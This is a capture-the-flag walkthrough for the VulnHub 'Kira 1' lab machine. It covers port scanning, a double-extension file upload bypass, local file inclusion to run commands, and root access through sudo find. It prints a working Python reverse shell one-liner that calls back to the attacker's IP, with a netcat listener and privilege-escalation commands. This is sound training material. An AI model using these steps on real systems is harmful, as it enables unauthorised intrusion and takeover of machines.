Capture the flag (CTF)

Kira 1: VulnHub CTF walkthrough

April 19, 2021 by LetsPen Test

This capture the flag (CTF) was originally posted on Vulnhub.com, a platform with vulnerable applications/machines users can use to gain hands-on information security experience. You can download the Kira CTF here: https://download.vulnhub.com/kira/KiraCTF.ova.

Bassam Assiri is the author of this CTF, which challenges users to gain root access and read the flag file. This should be a good exercise for beginners, but you should know Linux commands and have experience running basic pentesting tools.

Please note: For all of these machines, I have used Oracle Virtual Box to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

The steps

Here are the steps required to complete this CTF:

  • Getting the target machine IP address by running the VM
  • Getting open port details by using the Nmap Tool
  • Enumerating HTTP Service
  • Uploading file on the target system
  • Identifying LFI and executing commands by using LFI and file upload
  • Taking reverse shell
  • Getting the root access

The walkthrough

Step 1

The first step to start solving any CTF is to identify the target machine’s IP address. Since we are running a virtual machine in the same network, we can identify the target machine’s IP address by running the netdiscover command. The output of the command can be seen in the following screenshot. [CLICK IMAGES TO ENLARGE]

Command used: << netdiscover >>

In the above screenshot, we can see that we have identified the IP address of all the devices connected to our router but due to security reasons, we have hidden the MAC address of my personal connected devices. Our target machine IP address that we will be working on throughout this challenge is 192.168.1.11 (the target machine IP address). We will be using 192.168.1.19 as the attacker IP address.

Note: The target machine IP address may be different in your case, as it is being assigned by the network DHCP.

Step 2

After getting the target machine’s IP address, the next step is to find out the open ports and services available on the machine. We will use the Nmap tool for it, as it works effectively and is available on Kali Linux. The results can be seen below.

Command used: << nmap -p- -sV 192.168.1.11 >>

The Nmap output shows two ports on the target machine that have been identified as open. In the Nmap command, we used the “-sV” switch for version enumeration. We also used the “-p-“ option for a full port scan. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. By default, Nmap conducts the scan only on known 1024 ports. So, it is especially important to conduct a full port scan during the pentest or solving the CTF for maximum results.

However, in our case, we have found only one open port, which is being used for HTTP. So, in the next step, we will start with the HTTP port 80.

Step 3

We opened the target machine’s IP address on the browser to see the running web application. It can be seen in the following screenshot.

As can be seen in the above screenshot, a web application is running on our target system, and it has two buttons. So, let’s click on upload first, which will open another page as follows.

We tried to upload a simple image file that has been successfully uploaded and the path of the uploaded file is also visible on the page, which can be seen in the below screenshot.

The highlighted area shows the path of the uploaded file. We checked the uploaded file and identified that directory listing was also enabled in the upload directory, which can be seen in the following screenshot.

The highlighted area shows our uploaded file. In the next step, we will try to upload a malicious file by taking the advantage of the file upload functionally.

Step 4

In the previous step, we have seen that our target machine is having the file upload functionality, so we created the php shell and tried to upload it on the target machine, which was unsuccessful. To understand it more clearly, we set up the burp proxy with the browser and captured the request and response.

The server response in the above screenshot shows that we tried to upload the php file, but we received an error that the file is not an image. We tried to bypass the file upload restrictions but none of the techniques works. However, we were able to upload the php code by using the double extension which can be seen in the below screenshot.

The above screenshot shows that we can upload the shell.php1.png in which we have added the php code. But we will not be able to execute it, as it has a .png extension.

Step 5

From step three we know language functionally was also available on the running application. So, let’s open the language page which can be seen in the following screenshot.

We got a blank page. However, by closely analyzing the URL, we know there is a language parameter that is vulnerable for local file inclusion (LFI) vulnerability and we can read the /etc/passwd file by taking the advantage of it which can be seen below.

We have put the payload in the URL which shows the /etc/passwd file (highlighted above). By taking the advantage of this vulnerability, we can execute any internal file which is available on the same machine. Since we have already uploaded an image file with the php code. Let’s include that file here to execute the commands on our target machine.

As can be seen in the highlighted area of the above screenshot, we can execute the commands on the target machine and the output is coming back on the browser.

Step 6

As the goal of this CTF is to gain root access to the target machine, we will work towards taking the reverse shell of the target machine.

There are multiple ways through which we can take the reverse shell of the target machine. Some of them are listed below.

  • We can use the python perl command to take the reverse shell.
  • We can use Metasploit to create a reverse connection file and upload it on the target machine by using the wget utility and take the reverse connection.
  • If the target machine is using the NetCut utility, we can also use it for taking the reverse connection. It is the easiest way for reverse connection.

We will be using the first method where we will be creating a python or perl reverse shellcode, which will be used to make the reverse connection. To move further we have to identify which utility is available on the target machine. For that, we could run the help command. If we have proper output, it means that utility is available and can be used for writing the reverse connection code. First, we tried python –help, which has not given any output. After that, we used python3 –help, which shows that help command as follows.

It confirms that python3 is available on the target machine. We have written a small python code we will use for taking the reverse connection. The python code can be seen in the following screenshot.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.19”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

As can be seen in the above screenshot, we have added our attacker machine IP address (192.168.1.19) and port 1234, so before running the code, we have to start the NetCut listener on the attacker machine. Run it by using the nc -lvp 1234 command. Then run the code as a command in from the browser to attain the reverse connection, seen in the following screenshot.

Command used:

  • << nc -lvp 1234 >>
  • << id >>

Now we have the shell connection on the target machine. We quickly ran the id command to see the privilege of the shell and the output shows that it is not the root user. So, in the next step, we will be working towards getting the root access.

Step 7

Before going deeper, let us take the stable shell by running another python command, which can be seen in the following screenshot.

Command used: << python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Now we have the stable shell. We ran some more commands to enumerate the operating system and kernel version which can be seen in the below screenshot.

Command used:

  • << cat /etc/issue >>
  • << uname -a >>

The output of the command shows the running operating system and kernel version. We checked these versions online to see if they have any known vulnerabilities. Unfortunately, the running versions do not have any local privilege escalation vulnerabilities. During the enumeration, we got a directory in the document root folder which was a text file. It can be seen in the following screenshot:

Command used:

  • << ls -ltr >>
  • << cd supersecret-for-aziz >>
  • << cat bassam-pass.txt >>

As we can see in the above screenshot, that text file contains a password. Let’s try to use this password to if it’s a valid one.

Command used: << su assam >>

In the above screenshot, we can see that we used su bassam and used the identified password to attain the user shell. Again, we ran the id command to see privileges and got to know this user is not the root user. We spend some time in enumeration and during this activity, we ran sudo -l command, which tells us that the find command can be run as root.

Command used: << sudo -l >>

Now we know that the find command can be run with sudo. We did some research on google and find a command which gives us root access. It can be seen in the following screenshot.

Command used: << sudo find . -exec /bin/sh \; -quit >>

Now we have the root access. Let us read the flag file as follows.

Command used: << cat /root/flag.txt >>

The above screenshot shows that we got the flag, which completes this CTF.

 

Sources:

KIRA: CTF, Vulnhub (please hyperlink to KIRA: https://www.vulnhub.com/entry/kira-ctf,594/)

KIRA: CTF (download), Vulnhub (Same as above: https://download.vulnhub.com/kira/KiraCTF.ova.torrent)

Posted: April 19, 2021
Articles Author
LetsPen Test
View Profile

Leave a Reply

Your email address will not be published. Required fields are marked *